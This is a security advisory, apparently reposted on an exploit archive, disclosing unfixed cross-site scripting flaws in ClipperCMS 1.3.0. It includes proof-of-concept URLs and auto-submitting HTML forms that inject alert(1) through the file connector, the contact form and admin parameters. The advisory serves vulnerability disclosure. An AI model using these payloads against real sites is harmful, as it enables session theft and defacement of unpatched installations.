ClipperCMS 1.3.0 Cross Site Scripting

ClipperCMS 1.3.0 Cross Site Scripting: Posted Nov 16, 2015; Authored by Tim Coen | Site curesec.com; ClipperCMS version 1.3.0 suffers from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 4c6f5516319a5a619918e6a871d6dc45f13a04047e3447415add070f281913ae; Download | Favorite | View

ClipperCMS 1.3.0 Cross Site Scripting

Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    ClipperCMS 1.3.0
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      http://www.clippercms.com/
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  10/02/2015
Disclosed to public: 11/13/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Overview

There are various XSS vulnerabilities in ClipperCMS 1.3.0. Some require
specific non-default settings, while others do not require these settings.

3. XSS 1

CVSS

Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Proof of Concept


http://localhost/ClipperCMS-clipper_1.3.0/manager/media/browser/mcpuk/connectors/php/connector.php?foo=bar<img src=no onerror=alert(1)>

4. XSS 2

CVSS

Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description

The name, email, message, and subjected parameter of the Contact form are
vulnerable to XSS.

Contrary to the XSS issues in the admin area described below, these XSS work
without clickjacking or specific settings regarding referers.

Proof of Concept


The POCs for name and subjected are equivalent to this POC for email:

<html>
  <body>
    <form action="http://localhost/ClipperCMS-clipper_1.3.0/index.php?id=6" method="POST">
      <input type="hidden" name="name" value="test" />
      <input type="hidden" name="email" value="test@example.com"onfocus="alert(1)"autofocus="" />
      <input type="hidden" name="subjected" value="test" />
      <input type="hidden" name="message" value="test" />
      <input type="hidden" name="submit" value="Send" />
      <input type="hidden" name="formid" value="contactform" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


POC for message:

<html>
  <body>
    <form action="http://localhost/ClipperCMS-clipper_1.3.0/index.php?id=6" method="POST">
      <input type="hidden" name="name" value="test"onfocus="alert(1)"autofocus="" />
      <input type="hidden" name="email" value="test@example.com"onfocus" />
      <input type="hidden" name="subjected" value="test"onfocus="alert(1)"autofocus="" />
      <input type="hidden" name="message" value="test"></textarea><script>alert(1)</script>" />
      <input type="hidden" name="submit" value="Send" />
      <input type="hidden" name="formid" value="contactform" />
      <input type="submit" value="Submit request" />
    </form>
  </body>

5. XSS 3

CVSS

Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N

Description

The search field of the System Events page is vulnerable to XSS. To execute the
provided POC, the setting "Validate HTTP_REFERER headers" should be set to
false. Please note that it is likely possible to exploit this issue via
ClickJacking even if that setting is set to true.

Proof of Concept


<html>
  <body>
    <form action="http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=114" method="POST">
      <input type="hidden" name="id" value="" />
      <input type="hidden" name="listmode" value="" />
      <input type="hidden" name="op" value="" />
      <input type="hidden" name="search" value="" autofocus onfocus="alert(1)" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

6. XSS 4ff

CVSS

Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N

Description

Multiple parameters of various components of the admin area are vulnerable to
XSS.

To execute these POC, the setting "Validate HTTP_REFERER headers" should be set
to false.

Proof of Concept


http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=75&r=);}alert(1);function foo(){doRefresh(

http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=31&mode=drill&path=foo';alert(1);var bar='

http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=88"><img src=no onerror=alert(1)>&id=1

http://localhostClipperCMS-clipper_1.3.0/manager/index.php?a=114&id=&listmode="><img src=no onerror=alert(1)>&op=&search=test

http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1"><img src=no onerror=alert(1)>

7. Solution

This issue has not been fixed by the vendor.

8. Report Timeline

10/02/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/ClipperCMS-130-XSS-101.html

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

ClipperCMS 1.3.0 Cross Site Scripting

ClipperCMS 1.3.0 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

ClipperCMS 1.3.0 Cross Site Scripting

Share This

ClipperCMS 1.3.0 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems